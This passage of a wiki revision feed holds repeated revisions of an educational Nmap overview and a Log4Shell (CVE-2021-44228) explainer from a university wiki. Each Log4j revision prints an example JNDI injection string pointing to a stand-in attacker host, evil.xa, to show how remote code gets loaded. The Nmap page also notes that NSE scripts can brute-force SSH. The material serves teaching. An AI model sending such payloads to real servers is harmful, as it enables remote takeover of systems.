		<author><name>DCiklusic</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Nmap&amp;diff=11174</id>
		<title>Nmap</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Nmap&amp;diff=11174"/>
		<updated>2023-01-27T17:48:12Z</updated>

		<summary type="html">&lt;p&gt;DCiklusic: /* Description */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
Nmap (Network Mapper) is a free and open-source tool for network discovery and security auditing. Nmap can be used to identify hosts and services on a computer network, thus creating a “map” of the network. It can also be used to detect open ports and services, operating systems, and even live hosts on a network.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
Nmap uses various techniques such as IP address sweep, TCP and UDP port scans, and other methods to identify hosts and services on a network. It can also be used to detect firewalls, intrusion detection systems, and other security features. Nmap is also useful for troubleshooting network issues, as it can help identify misconfigured devices or other problems.&lt;br /&gt;
&lt;br /&gt;
Nmap can be run on various operating systems, including Windows, Linux, and MacOS. It also offers a command line interface, a graphical user interface, and can be integrated into other tools and scripts.&lt;br /&gt;
&lt;br /&gt;
In addition to the features mentioned above, Nmap also offers various advanced features such as:&lt;br /&gt;
&lt;br /&gt;
•	OS detection: Nmap can detect the operating system of a host by sending specific packets and analyzing the responses.&lt;br /&gt;
•	Version detection: Nmap can detect the version of the services running on a host.&lt;br /&gt;
•	Scripting Engine (NSE): NSE allows users to write and execute scripts to automate tasks and gather additional information about hosts and services on a network.&lt;br /&gt;
•	Output formats: Nmap can output the results of a scan in various formats such as XML or plain text.&lt;br /&gt;
•	Performance optimization: Nmap offers various options to optimize the speed and efficiency of a scan.&lt;br /&gt;
&lt;br /&gt;
Nmap can be run on a single host, a range of IP addresses, or even a list of IP addresses. It can also be used to scan for hosts on a specific subnet.&lt;br /&gt;
&lt;br /&gt;
Example of nmap output on a specific host:&lt;br /&gt;
&lt;br /&gt;
== Nmap Script Engine ==&lt;br /&gt;
&lt;br /&gt;
The Nmap Scripting Engine (NSE) is a powerful feature of Nmap that allows users to write scripts in Lua to automate tasks and gather additional information about hosts and services on a network. These scripts can be used to perform a wide range of tasks such as:&lt;br /&gt;
&lt;br /&gt;
=== •	Vulnerability detection: NSE scripts can be used to detect known vulnerabilities in a host or service. ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== •	Information gathering: NSE scripts can gather additional information about a host or service, such as the type of web server running or the version of the operating system. ===&lt;br /&gt;
&lt;br /&gt;
=== •	Brute-forcing: NSE scripts can be used to perform brute-force attacks on services such as SSH or Telnet. ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Step 2 ===&lt;br /&gt;
&lt;br /&gt;
Make sure to read&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
== Courses ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://wikipedia.org&lt;br /&gt;
* https://google.com&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>DCiklusic</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Nmap&amp;diff=11173</id>
		<title>Nmap</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Nmap&amp;diff=11173"/>
		<updated>2023-01-27T17:48:05Z</updated>

		<summary type="html">&lt;p&gt;DCiklusic: /* Description */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
Nmap (Network Mapper) is a free and open-source tool for network discovery and security auditing. Nmap can be used to identify hosts and services on a computer network, thus creating a “map” of the network. It can also be used to detect open ports and services, operating systems, and even live hosts on a network.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
Nmap uses various techniques such as IP address sweep, TCP and UDP port scans, and other methods to identify hosts and services on a network. It can also be used to detect firewalls, intrusion detection systems, and other security features. Nmap is also useful for troubleshooting network issues, as it can help identify misconfigured devices or other problems.&lt;br /&gt;
&lt;br /&gt;
Nmap can be run on various operating systems, including Windows, Linux, and MacOS. It also offers a command line interface, a graphical user interface, and can be integrated into other tools and scripts.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
In addition to the features mentioned above, Nmap also offers various advanced features such as:&lt;br /&gt;
&lt;br /&gt;
•	OS detection: Nmap can detect the operating system of a host by sending specific packets and analyzing the responses.&lt;br /&gt;
•	Version detection: Nmap can detect the version of the services running on a host.&lt;br /&gt;
•	Scripting Engine (NSE): NSE allows users to write and execute scripts to automate tasks and gather additional information about hosts and services on a network.&lt;br /&gt;
•	Output formats: Nmap can output the results of a scan in various formats such as XML or plain text.&lt;br /&gt;
•	Performance optimization: Nmap offers various options to optimize the speed and efficiency of a scan.&lt;br /&gt;
&lt;br /&gt;
Nmap can be run on a single host, a range of IP addresses, or even a list of IP addresses. It can also be used to scan for hosts on a specific subnet.&lt;br /&gt;
&lt;br /&gt;
Example of nmap output on a specific host:&lt;br /&gt;
&lt;br /&gt;
== Nmap Script Engine ==&lt;br /&gt;
&lt;br /&gt;
The Nmap Scripting Engine (NSE) is a powerful feature of Nmap that allows users to write scripts in Lua to automate tasks and gather additional information about hosts and services on a network. These scripts can be used to perform a wide range of tasks such as:&lt;br /&gt;
&lt;br /&gt;
=== •	Vulnerability detection: NSE scripts can be used to detect known vulnerabilities in a host or service. ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== •	Information gathering: NSE scripts can gather additional information about a host or service, such as the type of web server running or the version of the operating system. ===&lt;br /&gt;
&lt;br /&gt;
=== •	Brute-forcing: NSE scripts can be used to perform brute-force attacks on services such as SSH or Telnet. ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Step 2 ===&lt;br /&gt;
&lt;br /&gt;
Make sure to read&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
== Courses ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://wikipedia.org&lt;br /&gt;
* https://google.com&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>DCiklusic</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Nmap&amp;diff=11172</id>
		<title>Nmap</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Nmap&amp;diff=11172"/>
		<updated>2023-01-27T17:47:54Z</updated>

		<summary type="html">&lt;p&gt;DCiklusic: /* Nmap Script Engine */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
Nmap (Network Mapper) is a free and open-source tool for network discovery and security auditing. Nmap can be used to identify hosts and services on a computer network, thus creating a “map” of the network. It can also be used to detect open ports and services, operating systems, and even live hosts on a network.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
Nmap uses various techniques such as IP address sweep, TCP and UDP port scans, and other methods to identify hosts and services on a network. It can also be used to detect firewalls, intrusion detection systems, and other security features. Nmap is also useful for troubleshooting network issues, as it can help identify misconfigured devices or other problems.&lt;br /&gt;
&lt;br /&gt;
Nmap can be run on various operating systems, including Windows, Linux, and MacOS. It also offers a command line interface, a graphical user interface, and can be integrated into other tools and scripts.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
In addition to the features mentioned above, Nmap also offers various advanced features such as:&lt;br /&gt;
&lt;br /&gt;
•	OS detection: Nmap can detect the operating system of a host by sending specific packets and analyzing the responses.&lt;br /&gt;
•	Version detection: Nmap can detect the version of the services running on a host.&lt;br /&gt;
•	Scripting Engine (NSE): NSE allows users to write and execute scripts to automate tasks and gather additional information about hosts and services on a network.&lt;br /&gt;
•	Output formats: Nmap can output the results of a scan in various formats such as XML or plain text.&lt;br /&gt;
•	Performance optimization: Nmap offers various options to optimize the speed and efficiency of a scan.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nmap can be run on a single host, a range of IP addresses, or even a list of IP addresses. It can also be used to scan for hosts on a specific subnet.&lt;br /&gt;
&lt;br /&gt;
Example of nmap output on a specific host: &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Nmap Script Engine ==&lt;br /&gt;
&lt;br /&gt;
The Nmap Scripting Engine (NSE) is a powerful feature of Nmap that allows users to write scripts in Lua to automate tasks and gather additional information about hosts and services on a network. These scripts can be used to perform a wide range of tasks such as:&lt;br /&gt;
&lt;br /&gt;
=== •	Vulnerability detection: NSE scripts can be used to detect known vulnerabilities in a host or service. ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== •	Information gathering: NSE scripts can gather additional information about a host or service, such as the type of web server running or the version of the operating system. ===&lt;br /&gt;
&lt;br /&gt;
=== •	Brute-forcing: NSE scripts can be used to perform brute-force attacks on services such as SSH or Telnet. ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Step 2 ===&lt;br /&gt;
&lt;br /&gt;
Make sure to read&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
== Courses ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://wikipedia.org&lt;br /&gt;
* https://google.com&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>DCiklusic</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Nmap&amp;diff=11171</id>
		<title>Nmap</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Nmap&amp;diff=11171"/>
		<updated>2023-01-27T17:47:22Z</updated>

		<summary type="html">&lt;p&gt;DCiklusic: Created page with &amp;quot;== Summary ==   Nmap (Network Mapper) is a free and open-source tool for network discovery and security auditing. Nmap can be used to identify hosts and services on a computer network, thus creating a “map” of the network. It can also be used to detect open ports and services, operating systems, and even live hosts on a network.  == Description ==  Nmap uses various techniques such as IP address sweep, TCP and UDP port scans, and other methods to identify hosts and s...&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
Nmap (Network Mapper) is a free and open-source tool for network discovery and security auditing. Nmap can be used to identify hosts and services on a computer network, thus creating a “map” of the network. It can also be used to detect open ports and services, operating systems, and even live hosts on a network.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
Nmap uses various techniques such as IP address sweep, TCP and UDP port scans, and other methods to identify hosts and services on a network. It can also be used to detect firewalls, intrusion detection systems, and other security features. Nmap is also useful for troubleshooting network issues, as it can help identify misconfigured devices or other problems.&lt;br /&gt;
&lt;br /&gt;
Nmap can be run on various operating systems, including Windows, Linux, and MacOS. It also offers a command line interface, a graphical user interface, and can be integrated into other tools and scripts.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
In addition to the features mentioned above, Nmap also offers various advanced features such as:&lt;br /&gt;
&lt;br /&gt;
•	OS detection: Nmap can detect the operating system of a host by sending specific packets and analyzing the responses.&lt;br /&gt;
•	Version detection: Nmap can detect the version of the services running on a host.&lt;br /&gt;
•	Scripting Engine (NSE): NSE allows users to write and execute scripts to automate tasks and gather additional information about hosts and services on a network.&lt;br /&gt;
•	Output formats: Nmap can output the results of a scan in various formats such as XML or plain text.&lt;br /&gt;
•	Performance optimization: Nmap offers various options to optimize the speed and efficiency of a scan.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nmap can be run on a single host, a range of IP addresses, or even a list of IP addresses. It can also be used to scan for hosts on a specific subnet.&lt;br /&gt;
&lt;br /&gt;
Example of nmap output on a specific host: &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Nmap Script Engine ==&lt;br /&gt;
&lt;br /&gt;
The Nmap Scripting Engine (NSE) is a powerful feature of Nmap that allows users to write scripts in Lua to automate tasks and gather additional information about hosts and services on a network. These scripts can be used to perform a wide range of tasks such as:&lt;br /&gt;
&lt;br /&gt;
=== •	Vulnerability detection: NSE scripts can be used to detect known vulnerabilities in a host or service. ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
•	Information gathering: NSE scripts can gather additional information about a host or service, such as the type of web server running or the version of the operating system.&lt;br /&gt;
&lt;br /&gt;
•	Brute-forcing: NSE scripts can be used to perform brute-force attacks on services such as SSH or Telnet.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Step 2 ===&lt;br /&gt;
&lt;br /&gt;
Make sure to read&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
== Courses ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://wikipedia.org&lt;br /&gt;
* https://google.com&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>DCiklusic</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Log4j&amp;diff=10972</id>
		<title>Log4j</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Log4j&amp;diff=10972"/>
		<updated>2023-01-08T19:22:03Z</updated>

		<summary type="html">&lt;p&gt;DCiklusic: /* References */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
Log4Shell is a software vulnerability in Apache Log4j2, a popular Java library for logging error messages in applications. It was considered a zero-day vulnerability because malicious actors likely knew about and exploited it before any experts had the chance. The vulnerability enables a remote attacker to gain control over a string and trick the application into requesting and executing malicious code under the attacker&#039;s control. As a result, attackers can remotely take over any internet-connected service that uses certain versions of the Log4j library anywhere in the software stack. &lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
At the beginning of december 2021, a security vulnerability under the CVE-Number 2021-44228 was disclosed in the logging framework log4j developed for java. It was a zero day exploit which was undiscovered for 8 years. The exploit received a score of 10 out of 10 from the National Institute of Standards and Technology, the most points a vulnerability can receive. The Bundesamt für Informationssicherheit (BSI) also issued a red alert, because of the vulnerability. The affected versions of the vulnerability were all versions from 2.0 to 2.17.0. The exploit was closed with version 2.17.1.&lt;br /&gt;
&lt;br /&gt;
About 40% of all Java applications that use log messages use Log4j directly, and about 60% use the framework the framework indirectly. Log4j contains a feature called lookup, with which it is possible to replace parts of the log message dynamically (at runtime). Log4j also supports JNDI the so called JavaNaming and Directory Interface, which is an API provided by Java for a kind of lookup service, with which data and code can be found dynamically at runtime via a name. Basically it concerns thereby the named resolution. JNDI is often used in Java in connection with LDAP. There lies also the problem, because the return value of the LDAP server contains a URL, which points to a Java class. When log4j receives this URL, it reloads this Java class via JNDI and executes the code contained in it. So a JNDI LDAP call into an input form, as long as it is logged with log4j, causes that arbitrary code will be executed.&lt;br /&gt;
&lt;br /&gt;
== Execution ==&lt;br /&gt;
&lt;br /&gt;
[[File:Log4j.jpg]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
An attacker sends a request, for example from a manipulated user agent, to a vulnerable server, e.g. the server victim.xa (1). This server then writes to its log: The user agent named ${jndi:ldap://evil.xa/x} tries to access the website (2). This leads that the vulnerable Log4j implementation on this server evaluates and executes exactly this string and executes it (3). Log4j then asks the LDAP server, via the JNDI Lookup protocol, whether there is anyone with the manipulated user agent. The LDAP server responds with directory information containing a malicious Java class (4). The malicious Java class is executed and thus the system is compromised (5).&lt;br /&gt;
&lt;br /&gt;
== Types of attacks ==&lt;br /&gt;
&lt;br /&gt;
What was specifically done with the exploit: bots were installed, so-called zombies. These zombies are often used for example to implement spam email waves or to send phishing emails. Sometimes also for Denial of Service attacks or Distributed Denial of Service attacks, because they had asked different botsystems at the same time to take out a target. There were enough cryptominer installed this way. Backdoors are also installed. &lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://www.bsi.bund.de/SharedDocs/Cybersicherheitswarnungen/DE/2021/2021-549032-10F2.pdf?__blob=publicationFile&amp;amp;v=10&lt;br /&gt;
* https://nvd.nist.gov/vuln/detail/CVE-2021-44228&lt;br /&gt;
* https://www.cisa.gov/sites/default/files/publications/CSRB-Report-on-Log4-July-11-2022_508.pdf&lt;br /&gt;
* https://snyk.io/blog/log4j-vulnerability-software-supply-chain-security-log4shell/#:~:text=About%20%E2%85%93%20of%20Snyk%20customers,imported%20or%20monitored%20by%20Snyk.&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>DCiklusic</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Log4j&amp;diff=10971</id>
		<title>Log4j</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Log4j&amp;diff=10971"/>
		<updated>2023-01-08T19:20:32Z</updated>

		<summary type="html">&lt;p&gt;DCiklusic: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
Log4Shell is a software vulnerability in Apache Log4j2, a popular Java library for logging error messages in applications. It was considered a zero-day vulnerability because malicious actors likely knew about and exploited it before any experts had the chance. The vulnerability enables a remote attacker to gain control over a string and trick the application into requesting and executing malicious code under the attacker&#039;s control. As a result, attackers can remotely take over any internet-connected service that uses certain versions of the Log4j library anywhere in the software stack. &lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
At the beginning of december 2021, a security vulnerability under the CVE-Number 2021-44228 was disclosed in the logging framework log4j developed for java. It was a zero day exploit which was undiscovered for 8 years. The exploit received a score of 10 out of 10 from the National Institute of Standards and Technology, the most points a vulnerability can receive. The Bundesamt für Informationssicherheit (BSI) also issued a red alert, because of the vulnerability. The affected versions of the vulnerability were all versions from 2.0 to 2.17.0. The exploit was closed with version 2.17.1.&lt;br /&gt;
&lt;br /&gt;
About 40% of all Java applications that use log messages use Log4j directly, and about 60% use the framework the framework indirectly. Log4j contains a feature called lookup, with which it is possible to replace parts of the log message dynamically (at runtime). Log4j also supports JNDI the so called JavaNaming and Directory Interface, which is an API provided by Java for a kind of lookup service, with which data and code can be found dynamically at runtime via a name. Basically it concerns thereby the named resolution. JNDI is often used in Java in connection with LDAP. There lies also the problem, because the return value of the LDAP server contains a URL, which points to a Java class. When log4j receives this URL, it reloads this Java class via JNDI and executes the code contained in it. So a JNDI LDAP call into an input form, as long as it is logged with log4j, causes that arbitrary code will be executed.&lt;br /&gt;
&lt;br /&gt;
== Execution ==&lt;br /&gt;
&lt;br /&gt;
[[File:Log4j.jpg]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
An attacker sends a request, for example from a manipulated user agent, to a vulnerable server, e.g. the server victim.xa (1). This server then writes to its log: The user agent named ${jndi:ldap://evil.xa/x} tries to access the website (2). This leads that the vulnerable Log4j implementation on this server evaluates and executes exactly this string and executes it (3). Log4j then asks the LDAP server, via the JNDI Lookup protocol, whether there is anyone with the manipulated user agent. The LDAP server responds with directory information containing a malicious Java class (4). The malicious Java class is executed and thus the system is compromised (5).&lt;br /&gt;
&lt;br /&gt;
== Types of attacks ==&lt;br /&gt;
&lt;br /&gt;
What was specifically done with the exploit: bots were installed, so-called zombies. These zombies are often used for example to implement spam email waves or to send phishing emails. Sometimes also for Denial of Service attacks or Distributed Denial of Service attacks, because they had asked different botsystems at the same time to take out a target. There were enough cryptominer installed this way. Backdoors are also installed. &lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://www.bsi.bund.de/SharedDocs/Cybersicherheitswarnungen/DE/2021/2021-549032-10F2.pdf?__blob=publicationFile&amp;amp;v=10&lt;br /&gt;
* https://nvd.nist.gov/vuln/detail/CVE-2021-44228&lt;br /&gt;
* https://www.cisa.gov/sites/default/files/publications/CSRB-Report-on-Log4-July-11-2022_508.pdf&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>DCiklusic</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Log4j&amp;diff=10970</id>
		<title>Log4j</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Log4j&amp;diff=10970"/>
		<updated>2023-01-08T19:19:59Z</updated>

		<summary type="html">&lt;p&gt;DCiklusic: /* Execution */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
Log4Shell is a software vulnerability in Apache Log4j2, a popular Java library for logging error messages in applications. It was considered a zero-day vulnerability because malicious actors likely knew about and exploited it before any experts had the chance. The vulnerability enables a remote attacker to gain control over a string and trick the application into requesting and executing malicious code under the attacker&#039;s control. As a result, attackers can remotely take over any internet-connected service that uses certain versions of the Log4j library anywhere in the software stack. &lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
At the beginning of december 2021, a security vulnerability under the CVE-Number 2021-44228 was disclosed in the logging framework log4j developed for java. It was a zero day exploit which was undiscovered for 8 years. The exploit received a score of 10 out of 10 from the National Institute of Standards and Technology, the most points a vulnerability can receive. The Bundesamt für Informationssicherheit (BSI) also issued a red alert, because of the vulnerability. The affected versions of the vulnerability were all versions from 2.0 to 2.17.0. The exploit was closed with version 2.17.1.&lt;br /&gt;
&lt;br /&gt;
About 40% of all Java applications that use log messages use Log4j directly, and about 60% use the framework the framework indirectly. Log4j contains a feature called lookup, with which it is possible to replace parts of the log message dynamically (at runtime). Log4j also supports JNDI the so called JavaNaming and Directory Interface, which is an API provided by Java for a kind of lookup service, with which data and code can be found dynamically at runtime via a name. Basically it concerns thereby the named resolution. JNDI is often used in Java in connection with LDAP. There lies also the problem, because the return value of the LDAP server contains a URL, which points to a Java class. When log4j receives this URL, it reloads this Java class via JNDI and executes the code contained in it. So a JNDI LDAP call into an input form, as long as it is logged with log4j, causes that arbitrary code will be executed.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Execution ==&lt;br /&gt;
&lt;br /&gt;
[[File:Log4j.jpg]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
An attacker sends a request, for example from a manipulated user agent, to a vulnerable server, e.g. the server victim.xa (1). This server then writes to its log: The user agent named ${jndi:ldap://evil.xa/x} tries to access the website (2). This leads that the vulnerable Log4j implementation on this server evaluates and executes exactly this string and executes it (3). Log4j then asks the LDAP server, via the JNDI Lookup protocol, whether there is anyone with the manipulated user agent. The LDAP server responds with directory information containing a malicious Java class (4). The malicious Java class is executed and thus the system is compromised (5).&lt;br /&gt;
&lt;br /&gt;
== Types of attacks ==&lt;br /&gt;
&lt;br /&gt;
What was specifically done with the exploit: bots were installed, so-called zombies. These zombies are often used for example to implement spam email waves or to send phishing emails. Sometimes also for Denial of Service attacks or Distributed Denial of Service attacks, because they had asked different botsystems at the same time to take out a target. There were enough cryptominer installed this way. Backdoors are also installed. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://www.bsi.bund.de/SharedDocs/Cybersicherheitswarnungen/DE/2021/2021-549032-10F2.pdf?__blob=publicationFile&amp;amp;v=10&lt;br /&gt;
* https://nvd.nist.gov/vuln/detail/CVE-2021-44228&lt;br /&gt;
* https://www.cisa.gov/sites/default/files/publications/CSRB-Report-on-Log4-July-11-2022_508.pdf&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>DCiklusic</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Log4j&amp;diff=10969</id>
		<title>Log4j</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Log4j&amp;diff=10969"/>
		<updated>2023-01-08T19:19:45Z</updated>

		<summary type="html">&lt;p&gt;DCiklusic: Created page with &amp;quot;== Summary ==   Log4Shell is a software vulnerability in Apache Log4j2, a popular Java library for logging error messages in applications. It was considered a zero-day vulnerability because malicious actors likely knew about and exploited it before any experts had the chance. The vulnerability enables a remote attacker to gain control over a string and trick the application into requesting and executing malicious code under the attacker&amp;#039;s control. As a result, attackers...&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
Log4Shell is a software vulnerability in Apache Log4j2, a popular Java library for logging error messages in applications. It was considered a zero-day vulnerability because malicious actors likely knew about and exploited it before any experts had the chance. The vulnerability enables a remote attacker to gain control over a string and trick the application into requesting and executing malicious code under the attacker&#039;s control. As a result, attackers can remotely take over any internet-connected service that uses certain versions of the Log4j library anywhere in the software stack. &lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
At the beginning of december 2021, a security vulnerability under the CVE-Number 2021-44228 was disclosed in the logging framework log4j developed for java. It was a zero day exploit which was undiscovered for 8 years. The exploit received a score of 10 out of 10 from the National Institute of Standards and Technology, the most points a vulnerability can receive. The Bundesamt für Informationssicherheit (BSI) also issued a red alert, because of the vulnerability. The affected versions of the vulnerability were all versions from 2.0 to 2.17.0. The exploit was closed with version 2.17.1.&lt;br /&gt;
&lt;br /&gt;
About 40% of all Java applications that use log messages use Log4j directly, and about 60% use the framework the framework indirectly. Log4j contains a feature called lookup, with which it is possible to replace parts of the log message dynamically (at runtime). Log4j also supports JNDI the so called JavaNaming and Directory Interface, which is an API provided by Java for a kind of lookup service, with which data and code can be found dynamically at runtime via a name. Basically it concerns thereby the named resolution. JNDI is often used in Java in connection with LDAP. There lies also the problem, because the return value of the LDAP server contains a URL, which points to a Java class. When log4j receives this URL, it reloads this Java class via JNDI and executes the code contained in it. So a JNDI LDAP call into an input form, as long as it is logged with log4j, causes that arbitrary code will be executed.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Execution ==&lt;br /&gt;
&lt;br /&gt;
[[File:Log4j.jpg]]&lt;br /&gt;
An attacker sends a request, for example from a manipulated user agent, to a vulnerable server, e.g. the server victim.xa (1). This server then writes to its log: The user agent named ${jndi:ldap://evil.xa/x} tries to access the website (2). This leads that the vulnerable Log4j implementation on this server evaluates and executes exactly this string and executes it (3). Log4j then asks the LDAP server, via the JNDI Lookup protocol, whether there is anyone with the manipulated user agent. The LDAP server responds with directory information containing a malicious Java class (4). The malicious Java class is executed and thus the system is compromised (5).&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Types of attacks ==&lt;br /&gt;
&lt;br /&gt;
What was specifically done with the exploit: bots were installed, so-called zombies. These zombies are often used for example to implement spam email waves or to send phishing emails. Sometimes also for Denial of Service attacks or Distributed Denial of Service attacks, because they had asked different botsystems at the same time to take out a target. There were enough cryptominer installed this way. Backdoors are also installed. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://www.bsi.bund.de/SharedDocs/Cybersicherheitswarnungen/DE/2021/2021-549032-10F2.pdf?__blob=publicationFile&amp;amp;v=10&lt;br /&gt;
* https://nvd.nist.gov/vuln/detail/CVE-2021-44228&lt;br /&gt;
* https://www.cisa.gov/sites/default/files/publications/CSRB-Report-on-Log4-July-11-2022_508.pdf&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>DCiklusic</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=File:Log4j.jpg&amp;diff=10967</id>
		<title>File:Log4j.jpg</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=File:Log4j.jpg&amp;diff=10967"/>
		<updated>2023-01-08T19:12:45Z</updated>

		<summary type="html">&lt;p&gt;DCiklusic: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>DCiklusic</name></author>
	</entry>
</feed>